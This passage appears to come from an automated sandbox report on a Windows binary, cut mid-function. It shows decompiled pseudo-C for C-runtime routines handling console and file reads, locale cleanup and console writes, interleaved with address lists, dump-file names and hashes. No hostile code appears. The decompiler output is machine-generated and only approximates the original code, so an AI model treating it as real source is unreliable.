																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0xeaa6c8 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E00EA14F2(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(_t164 != _t235) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E00E95B87(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E00E95BBD())) = 9;
											 *(E00E95BAA()) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0xeaa6c8 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E00E975AE();
												} else {
													_t170 = E00E978CE();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E00E97775(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0xeaa6c8 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E00E95BBD())) = 0xc;
									 *(E00E95BAA()) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E00E964B8(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							_t196 =  !_t210;
							__eflags = _t196 & 0x00000001;
							if((_t196 & 0x00000001) != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0xeaa6c8 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E00E95BAA()) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E00E95BBD())) = 0x16;
					goto L60;
				} else {
					 *(E00E95BAA()) =  *_t197 & 0x00000000;
					_t139 = E00E95BBD();
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x00e97a5c
0x00e97a63
0x00e97a7d
0x00e97a7f
0x00e97de4
0x00e97de4
0x00e97de9
0x00e97de9
0x00e97df1
0x00e97df7
0x00e97df7
0x00000000
0x00e97df7
0x00e97a85
0x00e97a8b
0x00000000
0x00000000
0x00e97a95
0x00e97a9b
0x00e97a9e
0x00e97aa1
0x00e97aab
0x00e97aae
0x00e97ab1
0x00e97ab5
0x00e97ab7
0x00000000
0x00000000
0x00e97abd
0x00e97ac0
0x00e97ac6
0x00e97ae0
0x00e97ae2
0x00e97de0
0x00000000
0x00e97de0
0x00e97ae8
0x00e97aeb
0x00000000
0x00000000
0x00e97af1
0x00e97af5
0x00000000
0x00000000
0x00e97afb
0x00e97afe
0x00e97b02
0x00e97b09
0x00e97b0b
0x00e97b0b
0x00e97b0e
0x00e97b61
0x00e97b63
0x00e97b65
0x00e97b2b
0x00e97b30
0x00e97b37
0x00e97b3d
0x00000000
0x00e97b67
0x00e97b69
0x00e97b6a
0x00e97b6c
0x00e97b6f
0x00e97b71
0x00e97b73
0x00e97b75
0x00e97b75
0x00e97b80
0x00e97b82
0x00e97b89
0x00e97b8e
0x00e97b91
0x00e97b94
0x00e97b96
0x00e97bba
0x00e97bc2
0x00e97bc5
0x00e97bcc
0x00e97bd3
0x00e97bd7
0x00e97bd9
0x00e97bdc
0x00e97be3
0x00e97be3
0x00e97be6
0x00e97be8
0x00e97beb
0x00e97bf0
0x00e97bf3
0x00e97bfc
0x00e97c00
0x00e97c03
0x00e97c05
0x00e97c0b
0x00e97c0d
0x00e97c16
0x00e97c17
0x00e97c19
0x00e97c1d
0x00e97c1e
0x00e97c22
0x00e97c25
0x00e97c2f
0x00e97c34
0x00e97c37
0x00e97c46
0x00e97c4a
0x00e97c4d
0x00e97c4f
0x00e97c51
0x00e97c53
0x00e97c58
0x00e97c5a
0x00e97c5e
0x00e97c5f
0x00e97c65
0x00e97c6f
0x00e97c70
0x00e97c73
0x00e97c78
0x00e97c7b
0x00e97c8a
0x00e97c8e
0x00e97c91
0x00e97c93
0x00e97c95
0x00e97c97
0x00e97c99
0x00e97c9f
0x00e97c9f
0x00e97ca0
0x00e97caf
0x00e97cb2
0x00e97cb3
0x00e97cb3
0x00e97c97
0x00e97c93
0x00e97c7b
0x00e97c53
0x00e97c4f
0x00e97c37
0x00e97c0d
0x00e97c05
0x00e97cb9
0x00e97cbf
0x00e97cc1
0x00e97d34
0x00e97d34
0x00e97d38
0x00e97d48
0x00e97d4e
0x00e97d50
0x00e97dac
0x00e97dac
0x00e97db4
0x00e97db5
0x00e97db7
0x00e97dd0
0x00e97dd3
0x00e97d10
0x00e97d11
0x00000000
0x00e97d16
0x00e97dd9
0x00000000
0x00e97dd9
0x00e97dbe
0x00e97dc9
0x00000000
0x00e97dc9
0x00e97d52
0x00e97d55
0x00e97d58
0x00000000
0x00000000
0x00e97d5a
0x00e97d5a
0x00e97d5d
0x00e97d60
0x00e97d63
0x00e97d6a
0x00e97d6f
0x00e97d71
0x00e97d75
0x00e97d90
0x00e97d94
0x00e97d95
0x00e97d98
0x00e97d99
0x00e97da5
0x00e97d9b
0x00e97d9b
0x00e97d9b
0x00e97d77
0x00e97d77
0x00e97d77
0x00e97d82
0x00e97d87
0x00e97d8a
0x00e97d8a
0x00000000
0x00e97d6f
0x00e97cc6
0x00e97cc9
0x00e97cd0
0x00e97cd5
0x00000000
0x00000000
0x00e97cde
0x00e97ce4
0x00e97ce6
0x00000000
0x00000000
0x00e97ce8
0x00e97cec
0x00000000
0x00000000
0x00e97d00
0x00e97d06
0x00e97d08
0x00e97d2c
0x00e97d2f
0x00000000
0x00e97d2f
0x00e97d0a
0x00000000
0x00e97b98
0x00e97b9d
0x00e97ba8
0x00e97d17
0x00e97d17
0x00e97d17
0x00e97d1a
0x00e97d1b
0x00000000
0x00e97d23
0x00e97b96
0x00e97b65
0x00e97b10
0x00e97b13
0x00e97b25
0x00e97b27
0x00e97b29
0x00e97b4a
0x00e97b4d
0x00e97b50
0x00e97b53
0x00000000
0x00e97b53
0x00000000
0x00e97b15
0x00e97b15
0x00e97b18
0x00e97b1b
0x00000000
0x00e97b1b
0x00e97b13
0x00e97ac8
0x00e97acd
0x00e97ad5
0x00000000
0x00e97a65
0x00e97a6a
0x00e97a6d
0x00e97a72
0x00e97dfc
0x00000000
0x00e97dfc

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53df0f5e389749919443aa2663ae4478203748c96e9e60fabb6a351a87d2639f
Instruction ID: 68c704532d3cd132330ac23d39d31524ead8bbc369cc49f3c3acbaa726735f12
Opcode Fuzzy Hash: 53df0f5e389749919443aa2663ae4478203748c96e9e60fabb6a351a87d2639f
Instruction Fuzzy Hash: DEC1F370E18209AFDF15DF99C880BBDBBF0AF4A314F185059E884B7392D7749949CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E9B78F, Relevance: 13.7, APIs: 9, Instructions: 201
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00E9B78F(char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t59;
				signed int _t68;
				char _t81;
				intOrPtr* _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				char* _t113;
				signed int _t119;
				signed int* _t120;
				char _t122;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				char* _t129;

				_t122 = _a4;
				_v24 = _t122;
				_v20 = 0;
				if( *((intOrPtr*)(_t122 + 0xb0)) != 0 ||  *((intOrPtr*)(_t122 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E00E998AF(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t122 + 0x88), _t96 << 2);
						_t124 = E00E96F1C(4);
						_t119 = 0;
						_v8 = _t124;
						E00E964B8(0);
						if(_t124 != 0) {
							 *_t124 = 0;
							_t122 = _a4;
							if( *((intOrPtr*)(_t122 + 0xb0)) == 0) {
								_t52 =  *0xea90c0; // 0xea9114
								 *_t93 = _t52;
								_t53 =  *0xea90c4; // 0xeaa6b4
								 *((intOrPtr*)(_t93 + 4)) = _t53;
								_t54 =  *0xea90c8; // 0xeaa6b4
								 *((intOrPtr*)(_t93 + 8)) = _t54;
								_t55 =  *0xea90f0; // 0xea9118
								 *((intOrPtr*)(_t93 + 0x30)) = _t55;
								_t56 =  *0xea90f4; // 0xeaa6b8
								 *((intOrPtr*)(_t93 + 0x34)) = _t56;
								L19:
								 *_v8 = 1;
								if(_t119 != 0) {
									 *_t119 = 1;
								}
								goto L21;
							}
							_t120 = E00E96F1C(4);
							_v12 = _t120;
							E00E964B8(0);
							_push(_t93);
							if(_t120 != 0) {
								 *_t120 =  *_t120 & 0x00000000;
								_t121 =  *((intOrPtr*)(_t122 + 0xb0));
								_push(0xe);
								_push( *((intOrPtr*)(_t122 + 0xb0)));
								_push(1);
								_push( &_v24);
								_t68 = E00E9EDC5(_t93,  *((intOrPtr*)(_t122 + 0xb0)), _t122);
								_t16 = _t93 + 4; // 0x4
								_t125 = _t68;
								_t126 = _t125 | E00E9EDC5(_t93,  *((intOrPtr*)(_t122 + 0xb0)), _t125,  &_v24, 1, _t121, 0xf, _t16);
								_t18 = _t93 + 8; // 0x8
								_t127 = _t126 | E00E9EDC5(_t93, _t121, _t126,  &_v24, 1, _t121, 0x10, _t18);
								_t128 = _t127 | E00E9EDC5(_t93, _t121, _t127,  &_v24, 2, _t121, 0xe, _t93 + 0x30);
								_t22 = _t93 + 0x34; // 0x34
								if((E00E9EDC5(_t93, _t121, _t128,  &_v24, 2, _t121, 0xf, _t22) | _t128) == 0) {
									_t113 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t81 =  *_t113;
										if(_t81 == 0) {
											break;
										}
										_t30 = _t81 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t81 != 0x3b) {
												L16:
												_t113 = _t113 + 1;
												continue;
											}
											_t129 = _t113;
											do {
												_t82 = _t129 + 1;
												_t108 =  *_t82;
												 *_t129 = _t108;
												_t129 = _t82;
											} while (_t108 != 0);
											continue;
										}
										 *_t113 = _t107;
										goto L16;
									}
									_t119 = _v12;
									_t122 = _a4;
									goto L19;
								}
								E00E9B726(_t93);
								E00E964B8(_t93);
								E00E964B8(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E00E964B8(_v8);
								return _v16;
							}
							E00E964B8();
							goto L12;
						}
						E00E964B8(_t93);
						return 1;
					}
					return 1;
				} else {
					_t119 = 0;
					_v8 = 0;
					_t93 = 0xea90c0;
					L21:
					_t59 =  *(_t122 + 0x80);
					if(_t59 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t122 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t59 | 0xffffffff) == 0) {
							E00E964B8( *((intOrPtr*)(_t122 + 0x7c)));
							E00E964B8( *(_t122 + 0x88));
						}
					}
					 *((intOrPtr*)(_t122 + 0x7c)) = _v8;
					 *(_t122 + 0x80) = _t119;
					 *(_t122 + 0x88) = _t93;
					return 0;
				}
			}

0x00e9b799
0x00e9b79f
0x00e9b7a2
0x00e9b7ab
0x00e9b7ca
0x00e9b7d2
0x00e9b7d8
0x00e9b7eb
0x00e9b7ec
0x00e9b7f5
0x00e9b7f7
0x00e9b7fa
0x00e9b7fd
0x00e9b806
0x00e9b817
0x00e9b819
0x00e9b822
0x00e9b974
0x00e9b979
0x00e9b97b
0x00e9b980
0x00e9b983
0x00e9b988
0x00e9b98b
0x00e9b990
0x00e9b993
0x00e9b998
0x00e9b904
0x00e9b90a
0x00e9b90e
0x00e9b910
0x00e9b910
0x00000000
0x00e9b90e
0x00e9b82f
0x00e9b833
0x00e9b836
0x00e9b83d
0x00e9b840
0x00e9b84d
0x00e9b853
0x00e9b859
0x00e9b85b
0x00e9b85c
0x00e9b85e
0x00e9b85f
0x00e9b864
0x00e9b867
0x00e9b878
0x00e9b87a
0x00e9b88c
0x00e9b8a3
0x00e9b8a5
0x00e9b8bc
0x00e9b8e8
0x00e9b8f8
0x00e9b8f8
0x00e9b8fc
0x00000000
0x00000000
0x00e9b8ed
0x00e9b8ed
0x00e9b8f3
0x00e9b961
0x00e9b8f7
0x00e9b8f7
0x00000000
0x00e9b8f7
0x00e9b963
0x00e9b965
0x00e9b965
0x00e9b968
0x00e9b96a
0x00e9b96c
0x00e9b96e
0x00000000
0x00e9b972
0x00e9b8f5
0x00000000
0x00e9b8f5
0x00e9b8fe
0x00e9b901
0x00000000
0x00e9b901
0x00e9b8bf
0x00e9b8c5
0x00e9b8cd
0x00e9b8d5
0x00e9b8d9
0x00e9b8dd
0x00000000
0x00e9b8e5
0x00e9b842
0x00000000
0x00e9b847
0x00e9b809
0x00000000
0x00e9b811
0x00000000
0x00e9b7b5
0x00e9b7b5
0x00e9b7b7
0x00e9b7ba
0x00e9b912
0x00e9b912
0x00e9b91a
0x00e9b91c
0x00e9b91c
0x00e9b924
0x00e9b929
0x00e9b92d
0x00e9b932
0x00e9b93d
0x00e9b943
0x00e9b92d
0x00e9b947
0x00e9b94c
0x00e9b952
0x00000000
0x00e9b952

APIs

_free.LIBCMT ref: 00E9B7FD
_free.LIBCMT ref: 00E9B809
_free.LIBCMT ref: 00E9B932
_free.LIBCMT ref: 00E9B93D

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 46144fd6b578d445760285ef6906d3a319cd45711f47a4e02a79613ebff9cd08
Instruction ID: 295f3eedba9fe78fbffa59f8b646dd3829691c1a464ec083ecca3046ff74c9e3
Opcode Fuzzy Hash: 46144fd6b578d445760285ef6906d3a319cd45711f47a4e02a79613ebff9cd08
Instruction Fuzzy Hash: 9B61C2719003059FDF20DFB4D981BAAB7F8EF89350F10516AE955FB281EB70AD008B50

Uniqueness

Uniqueness Score: -1.00%

Function 00EA22B6, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 319
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00EA22B6(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				long _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t172;
				signed int _t174;
				intOrPtr _t176;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				long _t235;
				struct _OVERLAPPED* _t243;
				signed int _t246;
				intOrPtr _t249;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				struct _OVERLAPPED* _t256;
				intOrPtr _t258;
				void* _t262;
				long _t263;
				signed char _t264;
				signed int _t265;
				void* _t266;
				void* _t268;
				struct _OVERLAPPED* _t269;
				long _t270;
				signed int _t271;
				long _t275;
				signed int _t278;
				long _t279;
				struct _OVERLAPPED* _t280;
				signed int _t282;
				intOrPtr _t284;
				signed int _t286;
				signed int _t289;
				long _t290;
				long _t291;
				signed int _t292;
				intOrPtr _t293;
				signed int _t294;
				void* _t295;
				void* _t296;

				_t172 =  *0xea9014; // 0xa413846
				_v8 = _t172 ^ _t294;
				_t174 = _a8;
				_t263 = _a12;
				_t282 = (_t174 & 0x0000003f) * 0x38;
				_t246 = _t174 >> 6;
				_v112 = _t263;
				_v84 = _t246;
				_t176 =  *((intOrPtr*)(0xeaa6c8 + _t246 * 4));
				_v80 = _t282;
				_t10 = _t176 + 0x18; // 0x8458b01
				_t284 = _a16 + _t263;
				_v116 =  *((intOrPtr*)(_t282 + _t10));
				_v104 = _t284;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E00E919CE( &_v72, 0);
				asm("stosd");
				_t249 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t249;
				asm("stosd");
				asm("stosd");
				_t275 = _v112;
				_v40 = _t275;
				if(_t275 >= _t284) {
					L52:
					__eflags = _v60 - _t243;
				} else {
					_t286 = _v92;
					while(1) {
						_v47 =  *_t275;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0xeaa6c8 + _v84 * 4));
						_v52 = _t186;
						if(_t249 != 0xfde9) {
							goto L23;
						}
						_t265 = _v80;
						_t212 = _t186 + 0x2e + _t265;
						_t256 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
							_t256 =  &(_t256->Internal);
							if(_t256 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t278 = _v104 - _t213;
						_v44 = _t256;
						if(_t256 <= 0) {
							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0xea91d8)) + 1;
							_v52 = _t258;
							__eflags = _t258 - _t278;
							if(_t258 > _t278) {
								__eflags = _t278;
								if(_t278 <= 0) {
									goto L44;
								} else {
									_t290 = _v40;
									do {
										_t266 = _t265 + _t243;
										_t216 =  *((intOrPtr*)(_t243 + _t290));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t266 +  *((intOrPtr*)(0xeaa6c8 + _v84 * 4)) + 0x2e)) = _t216;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									goto L43;
								}
							} else {
								_t279 = _v40;
								__eflags = _t258 - 4;
								_v144 = _t243;
								_t260 =  &_v144;
								_v140 = _t243;
								_v56 = _t279;
								_t219 = (0 | _t258 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t265 + _v52 + 0x2e) & 0x000000ff) + 0xea91d8)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t256;
							_v52 = _t229;
							if(_t229 > _t278) {
								__eflags = _t278;
								if(_t278 > 0) {
									_t291 = _v40;
									do {
										_t268 = _t265 + _t243 + _t256;
										_t231 =  *((intOrPtr*)(_t243 + _t291));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t268 +  *((intOrPtr*)(0xeaa6c8 + _v84 * 4)) + 0x2e)) = _t231;
										_t256 = _v44;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									L43:
									_t286 = _v92;
								}
								L44:
								_t289 = _t286 + _t278;
								__eflags = _t289;
								L45:
								__eflags = _v60;
								_v92 = _t289;
							} else {
								_t269 = _t243;
								if(_t256 > 0) {
									_t293 = _v108;
									do {
										 *((char*)(_t294 + _t269 - 0xc)) =  *((intOrPtr*)(_t293 + _t269));
										_t269 =  &(_t269->Internal);
									} while (_t269 < _t256);
									_t229 = _v52;
								}
								_t279 = _v40;
								if(_t229 > 0) {
									E00E8D670( &_v16 + _t256, _t279, _v52);
									_t256 = _v44;
									_t295 = _t295 + 0xc;
								}
								if(_t256 > 0) {
									_t270 = _v44;
									_t280 = _t243;
									_t292 = _v80;
									do {
										_t262 = _t292 + _t280;
										_t280 =  &(_t280->Internal);
										 *(_t262 +  *((intOrPtr*)(0xeaa6c8 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t280 < _t270);
									_t279 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t260 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E00EA3A20(_t260);
								_t296 = _t295 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t275 = _t279 + _v52 - 1;
									L31:
									_t275 = _t275 + 1;
									_v40 = _t275;
									_t193 = E00E9A975(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t295 = _t296 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t286 = _v88 - _v112 + _t275;
											_v92 = _t286;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t275 >= _v104) {
														goto L52;
													} else {
														_t249 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t286 = _t286 + 1;
															_v92 = _t286;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t252 = _v80;
						_t264 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t275;
							_t188 = E00E95632();
							_t253 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
								_push(1);
								_push(_t275);
								goto L30;
							} else {
								_t202 = _t275 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t271 = _v84;
									_t255 = _v80;
									 *((char*)(_t255 +  *((intOrPtr*)(0xeaa6c8 + _t271 * 4)) + 0x2e)) = _v33;
									 *(_t255 +  *((intOrPtr*)(0xeaa6c8 + _t271 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0xeaa6c8 + _t271 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t286 + 1;
									goto L45;
								} else {
									_t206 = E00E9FAC5( &_v76, _t275, 2);
									_t296 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t275 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
							_v23 =  *_t275;
							_push(2);
							 *(_t252 + _v52 + 0x2d) = _t264 & 0x000000fb;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E00E9FAC5();
							_t296 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t294;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E00E8AE43(_v8 ^ _t294);
			}

0x00ea22c1
0x00ea22c8
0x00ea22cb
0x00ea22d0
0x00ea22d8
0x00ea22db
0x00ea22df
0x00ea22e2
0x00ea22e5
0x00ea22ec
0x00ea22ef
0x00ea22f6
0x00ea22f8
0x00ea22fb
0x00ea22fe
0x00ea2304
0x00ea2306
0x00ea230d
0x00ea231a
0x00ea231b
0x00ea231e
0x00ea2321
0x00ea2322
0x00ea2323
0x00ea2326
0x00ea232b
0x00ea2637
0x00ea2637
0x00ea2331
0x00ea2331
0x00ea2334
0x00ea2336
0x00ea233c
0x00ea233f
0x00ea2346
0x00ea234d
0x00ea2356
0x00000000
0x00000000
0x00ea235c
0x00ea2362
0x00ea2364
0x00ea2366
0x00ea2369
0x00ea236e
0x00ea2372
0x00000000
0x00000000
0x00000000
0x00ea2372
0x00ea2377
0x00ea237a
0x00ea237c
0x00ea2381
0x00ea2433
0x00ea2434
0x00ea2437
0x00ea2439
0x00ea25e7
0x00ea25e9
0x00000000
0x00ea25eb
0x00ea25eb
0x00ea25ee
0x00ea25f1
0x00ea25fa
0x00ea25fd
0x00ea25fe
0x00ea2602
0x00ea2605
0x00ea2605
0x00000000
0x00ea2609
0x00ea243f
0x00ea243f
0x00ea2444
0x00ea2447
0x00ea244d
0x00ea2453
0x00ea245c
0x00ea245f
0x00ea245f
0x00ea2460
0x00ea2461
0x00ea2464
0x00ea2465
0x00000000
0x00ea2465
0x00ea2387
0x00ea2396
0x00ea2397
0x00ea239a
0x00ea239c
0x00ea23a1
0x00ea25b2
0x00ea25b4
0x00ea25b6
0x00ea25b9
0x00ea25be
0x00ea25c7
0x00ea25ca
0x00ea25cb
0x00ea25cf
0x00ea25d2
0x00ea25d5
0x00ea25d5
0x00ea25d9
0x00ea25d9
0x00ea25d9
0x00ea25dc
0x00ea25dc
0x00ea25dc
0x00ea25de
0x00ea25de
0x00ea25e2
0x00ea23a7
0x00ea23a7
0x00ea23ab
0x00ea23ad
0x00ea23b0
0x00ea23b3
0x00ea23b7
0x00ea23b8
0x00ea23bc
0x00ea23bc
0x00ea23bf
0x00ea23c4
0x00ea23d0
0x00ea23d5
0x00ea23d8
0x00ea23d8
0x00ea23dd
0x00ea23df
0x00ea23e2
0x00ea23e4
0x00ea23e7
0x00ea23ea
0x00ea23ed
0x00ea23f5
0x00ea23f9
0x00ea23fd
0x00ea23fd
0x00ea2403
0x00ea2409
0x00ea240c
0x00ea2414
0x00ea241b
0x00ea241f
0x00ea2420
0x00ea2423
0x00ea2424
0x00ea2468
0x00ea2468
0x00ea246c
0x00ea246d
0x00ea2472
0x00ea2478
0x00000000
0x00ea247e
0x00ea2482
0x00ea250b
0x00ea2512
0x00ea251a
0x00ea2522
0x00ea2527
0x00ea252a
0x00ea252f
0x00000000
0x00ea2535
0x00ea254a
0x00ea262e
0x00ea2634
0x00000000
0x00ea2550
0x00ea2559
0x00ea255b
0x00ea2561
0x00000000
0x00ea2567
0x00ea256b
0x00ea25a1
0x00ea25a4
0x00000000
0x00ea25aa
0x00ea25aa
0x00000000
0x00ea25aa
0x00ea256d
0x00ea256f
0x00ea2571
0x00ea258a
0x00000000
0x00ea2590
0x00ea2594
0x00000000
0x00ea259a
0x00ea259a
0x00ea259d
0x00ea259e
0x00000000
0x00ea259e
0x00ea2594
0x00ea258a
0x00ea256b
0x00ea2561
0x00ea254a
0x00ea252f
0x00ea2478
0x00ea23a1
0x00000000
0x00ea2489
0x00ea2489
0x00ea248c
0x00ea2490
0x00ea2493
0x00ea24b5
0x00ea24b8
0x00ea24bd
0x00ea24c1
0x00ea24c5
0x00ea24f3
0x00ea24f5
0x00000000
0x00ea24c7
0x00ea24c7
0x00ea24ca
0x00ea24cd
0x00ea24d0
0x00ea260b
0x00ea260e
0x00ea261b
0x00ea2626
0x00ea262b
0x00000000
0x00ea24d6
0x00ea24dd
